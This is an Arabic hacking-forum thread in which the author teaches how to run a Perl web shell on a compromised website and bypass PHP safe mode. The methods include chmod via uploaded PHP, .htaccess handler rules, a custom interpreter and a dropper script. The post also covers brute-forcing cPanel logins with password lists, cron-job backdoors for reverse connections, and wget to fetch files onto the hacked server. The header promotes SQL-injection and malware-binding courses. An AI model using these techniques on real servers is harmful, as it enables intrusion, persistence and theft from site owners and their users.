1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] طرق تشغيل البيرل على السيرفر

الموضوع في 'آمن المواقع والسيرفرات' بواسطة virus-3sir, بتاريخ ‏10 يونيو 2014.

كاتب الموضوع : virus-3sir المشاهدات : 424 الردود : 6 ‏10 يونيو 2014
  1. غير متصل

    virus-3sir
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركـآته

    موضوعنـآ اليوم من أهم المواضيع
    ويتكلم عـن طرق تشغيــل البيرل على السيرفر
    وساقوم فيه بطرح جميـع مآلدي من طرق بـ إذن الله
    وهي ليست من اكتشافي ..
    ولكنها مما تعلمته وجمعتـه فـ قمت بشرحه


    أولا: مآهو البيــرل - وماهي فائدته

    البيرل " Perl" عباره عن لغـه من لغات البرمجـه كـ php + python وغيرهـآ
    وكلمة perl إختصار لـ Practical Extraction and Report ********
    وتنتهـي الملفـآت المكتوبه بـ لغة البيرل بـ الامتدآد pl
    مثال "shell.pl"

    وفائدة البيرل بالنسبه للإختراق
    تكمن في رفعه على الموقع المخترق وتشغيله
    فـ إذا استطعت تشغيل البيرل تتخطى الحمايه وتستطيع تنفيذ اي أمر منه ..
    حتى لو كآن SAFE MODE:ON والدوآل محجوبه


    نـأتي الآن الى طرق تشغيــل البيرل على السيرفر

    أولا :
    في حآلة كآن SAFE MODE : OFF
    والدوآل معطله ..

    [​IMG]

    اي انك تستطيع تنفيذ الأوامر من الشيل العادي

    قم برفع ملف البيرل مثلا اسمه "shell.pl" وأعطه تصريح 755
    عن طريق الامر التالي:

    كود PHP:
    chmod 755 shell.pl
    ثم قم بـ إستعراضه من المتصفح www.site.com/shell.pl

    وسوف يعمل بـ إذن الله

    [​IMG]

    نأتي الآن لطرق تشغيله في حآلة فعالية الوضع الامن SAFE MODE : ON
    كما نشاهد الصوره الان

    [​IMG]

    أي أنـك لاتستطيع تنفيذ أي أمر نهـآئيا

    هنـآك عدة حلول

    أولا:
    عن طريق دآلة chmod
    اذا لم تكون موجوده ضمن الدوال المحظوره " Disable functions "

    نقوم بعمل ملف نسميه مثلا "chmod.php"
    ونضع بدآخله الكود التـآلي

    كود PHP:
     <?php
    chmod 
    ("shell.pl","0755");
    ?> 

    مع تغيير shell.pl الى اسم اداة البيرل المرفوعه
    ونقوم برفع الملف بنفس مسار البيرل
    ثم نقوم باستعراض الملف chmod.php في المتصفح
    www.site.com/chmod.php

    اذا ظهرت لنا صفحه بيضاء عند استعراضه..
    فهذا دليل على نجاح العمليه
    نعود الى الشيل ونحدثه .. نجد ان ملف البيرل تم تصريحه 755 بنجاح
    ونقوم باستعراضه

    وهنـآك ايضا انوآع من الشيـلآت توجد فيها خاصية تعديل التصريح
    من ضمنها شيل milw0rm وغيره
    ضع مسار ملف البيرل وإسمه واعطه تصريح 755
    كما في الصوره

    [​IMG]


    وايضا جرب ترفع البيرل في مجلد cgi-bin اذا وجد ..
    وقم بتصريحه باحدى الطرق السابقه واستعراضه
    www.site.com/cgi-bin/shell.pl

    أيضا تستطيع تصريحه عن طريق الاتصال العكسي اذا استطعت الاتصال
    وهنـآك شيلات تستطيع عن طريقها الاتصال العكسي مثل r57 وغيره

    [​IMG]

    وسيتم باذن الله شرح جميع طرق الاتصال العكسي
    ولكن في موضوع منفصل .. حتى لانخرج عن موضوعنآ

    ~

    أحيانا عند تصريح البيرل واستعراضه .. يخرج لك على شكل نصي
    أي يعرض لك مصدر الملف ..
    وحل ذلك .. قم بفتح ملف البيرل وتعديله واستبدل

    كود PHP:
    #!/usr/bin/perl
    اللتي في اول سطر .. الى

    كود PHP:
    #!/usr/bin/perl -I/usr/local/bandmin
    واذا لم تنفع استبدلها الى

    كود PHP:
    #!/home/USER/public_html
    ضع مكآن USER يوزر موقعك ومسار الملف

    نـأتي الان لطريقة تصريح البيرل من السيبانل cpanel

    احيآنا لاتنفع الطرق السابقه وعليك بالحصول على سيبانل
    وللحصول على سيبانل
    قم بتجربة باسوورد كونفق الموقع المتواجد عليه ويوزر الموقع
    وحاول الدخول بهآ للوحه ..
    او قم بـجمع عدد من يوزرات السيرفر مع يوزر موقعك
    وخمن عليها بواسطة احد سكربتات التخمين ولستتة باسسوردات


    بعد الحصول على سيبانل ودخول اللوحه
    نذهب الى File Manager "مدير الملفات"

    [​IMG]

    ونذهب الى مجلد رئيسية الموقع " public_html "
    او اي مجلد عليها
    ونرفع ملف البيرل .. ونقوم باعطائه تصريحه 755 كما في الصوره

    [​IMG]

    وتستطيع ايضا عن طريق السي بانل رفع باك دور
    والاتصال به عكسيا عن طريق corn job
    وهذا سيتم شرحه في موضوع خاص بالاتصال العكسي

    تشغيل البيرل عن طريق تغيير امتدآده ~

    أي تشغيله بـ أي أمتداد آخر غير pl يصبح pp مثلا "perl.pp"

    نقوم الان بعمل مجلد جديد .. او ندخل مجلد اخر غير اللي عليه الشيل
    حتى لايقوم الـ هاتكسس بـ إفساد الشيل

    نقوم برفع ملف البيرل المغير امتداده "perl.pp"
    وملف الهاتكسس بمجلد وآحد

    ضع بملف الهاتكسس الكود التالي


    كود PHP:
    Options FollowSymLinks MultiViews Indexes ExecCGI

    AddType application
    /x-httpd-cgi .pp

    AddHandler cgi
    -script .pp
    AddHandler cgi
    -script .pp
    غير pp الى الامتداد اللى نفس امتداد البيرل المعدل اللي رفعته
    وقم باعطآء ملف البيرل "perl.pp" تصريح 755 باي طريقه من الطرق السابقه
    ثم قم باستعراضه من المتصفح .. مثال
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    perl.pp
    غير xxx الى اسم المجلد اللي رفعت فيه


    او قم برفع الملف التالي
    xa7m3d.php
    لتحميل الملف من هنـآ
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    بعد ماتقوم برفع الملف xa7m3d.php
    قم بـ إستعراضه مثلا

    كود:
    [COLOR=DarkGreen][COLOR=DarkGreen]www.site.com/[COLOR=DarkRed]xa7m3d.php[/COLOR][/COLOR][/COLOR]


    سوف يخرج لك صفحه بيضاء مكتوب فيها العباره التاليه

    كود PHP:
    Done .. You Will Find File As xa7m3d/xa7m3d.evil Open It And Password To Login xa7m3d ### This Tool Coded By Xa7m3d
    يعني ان العمليه نجحت
    وهذا السكربت عندمآ تقوم بـمجرد إستعراضه
    يعمل لك مجلد بـ إسم xa7m3d
    ويضع فيه الأدوآت "الهاتكسس+شيل بيرل مغير امتدآده ومصرح جاهز"
    نخش على مجلد xa7m3d من المتصفح

    كود:
    www.site.com/[COLOR=DarkRed]xa7m3d[/COLOR]


    نجد شيل البيرل أمـآمنا بـ إسم xa7m3d.evil
    كما نرى في الصوره


    [​IMG]

    نقوم باستعراضه
    www.site.com/xa7m3d/xa7m3d.evil

    ونجد شيل البيرل أمآمنا
    ملاحضه .. بـآسوورد شيل البيرل : xa7m3d

    وعند رفعك لادوآت بيرل أخرى مثل ادوآت سحب الكونفج او اليوزرات
    ارفعها بنفس المجلد
    وغير امتدادها لنفس امتداد شل البيرل المعدل "evil" مثلا "config.evil"
    لكن قم بتصريحها اذا رفعتهـآِ .. ~

    تشغيـل البيرل عن طريق رفع مترجم للبيرل

    أولا قم بتحميل مترجم البيرل

    رفعته لكم هنا

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    نقوم بعمل مجلد جديد

    وان لم نستطع نذهب لأي مجلد فرعي اخر غير مجلد الشيل الرئيسي
    ونرفع فيه المترجم + شيل البيرل "مغير امتداده" + هاتكسس
    نعطي مترجم البيرل تصريح 755


    كود PHP:
    chmod 755 kh

    kh = اسم المترجم ~ أو نصرحه برفع ملف كما في بداية الموضوع
    اذا لم تكن دالة chmod محظوره
    ونصرح شيل البيرل ايضا نفس التصريح
    ويكون كود الهاتكسس كالتالي


    كود PHP:
    Options FollowSymLinks MultiViews Indexes ExecCGI

    AddType application
    /x-httpd-cgi .pp

    AddHandler cgi
    -script .pp
    AddHandler cgi
    -script .pp
    "pp" غيره لامتداد البيرل الذي رفعته
    وافتح شيل البيرل واحذف فيه السطر الاول

    كود PHP:
    #!/usr/bin/perl 
    وضع مكانها
    كود PHP
    :
    #!kh -w 
    يعني غيرنا مسار البيرل الاعتيادي في السيرفرات الى مترجمنا
    وبـ إذن الله يشتغل البيرل


    هذا كل مالدي حآليا ..
    وبـ إذن الله في قادم الايام سيتم التطرق لأمور أخرى

    البعض قد لايعرف كيف يتعامل مع شيل البيرل
    لانه مجرد سطر اوامر
    وللمعلوميه .. كل ماتفعله في الشيل العادي عباره عن اوامر
    نفذها في شيل البيرل .. لايوجد إختلاف سوى اختلاف بسيط
    بعض الاوامر المهمـه " المختلفه"

    امر دخول مجلد معين

    كود PHP:
    cd folder

    غير folder لاسم المجلد

    أمر الرجوع للمجلد السابق أو للخلف

    كود PHP:
    cd ../ 
    امر استعراض الملفات في المجلد المتواجد عليه

    كود PHP:
    ls

    امر استعراض الملفات وتصاريحها

    كود PHP:
    ls -la


    معلومات عن السيرفر

    كود PHP:
    u**** -a

    قراة ملف معين مثلا "a.txt"

    كود PHP:
    cat a.txt


    حذف ملف معين مثلا "a.txt"

    كود PHP:
    rm a.txt

    أمر سحب ملف معين من موقع آخر مثلا "a.txt"

    كود PHP:
    wget http://www.site.com/a.txt

    قم بالبحث عن أوامر الليونكس وأستعملها
    ونصيحه أبعد عن " النسخ واللصق "
    حتى تحفظ الاوامر مع الايام ومع التطبيق المتكرر

    لتحميل شيل البيرل من هنـآ

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    باسسورد الشيل v-3

    تــم الكلام وربنـآ المحمود .. وله المكآرم والعـلآ والجود

    ~

    ولا اسمح من يقوم بنقله حرفيا بالكامل إلآ بذكر الحقوق

    أخوكم virus-3sir

    في أمـآن الله

     


    جاري تحميل الصفحة...
  2. غير متصل

    ! ـآوتآر !
    DeveloPer Plus

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: طرق تشغيل البيرل على السيرفر

    السسلام عليڪم ورحمة الله و برڪاته :|

    بارڪ الله فيڪ اخي

    موفقڪ ً#ٌ5oًًًُ.​
     


  3. غير متصل

    ИмЯ
    rankrank
    Active DeveloPer

    عضو منذ:
    ‏6 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: طرق تشغيل البيرل على السيرفر

    يعطيك العافية أخوي وما قصرت ^:"
     


  4. غير متصل

    Jankaro
    rankrank
    Developer

    عضو منذ:
    ‏22 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: طرق تشغيل البيرل على السيرفر

    مشكور اخى الغالى على الطرح المميز
     


  5. غير متصل

    ByGhazi2010
    rank
    Developer

    عضو منذ:
    ‏20 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: طرق تشغيل البيرل على السيرفر

    وعليكم السلآم ،
    الله يعطيك العافية ،
    شرح سلس
     


  6. غير متصل

    m0j4hed
    rankrank
    Developer

    عضو منذ:
    ‏20 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: طرق تشغيل البيرل على السيرفر

    بارك الله فيك يالغالي .. :{1}:
     


  7. غير متصل

    الحاق1
    rankrank
    Developer

    عضو منذ:
    ‏17 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: طرق تشغيل البيرل على السيرفر

    بارك الله بك و نفع بك
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...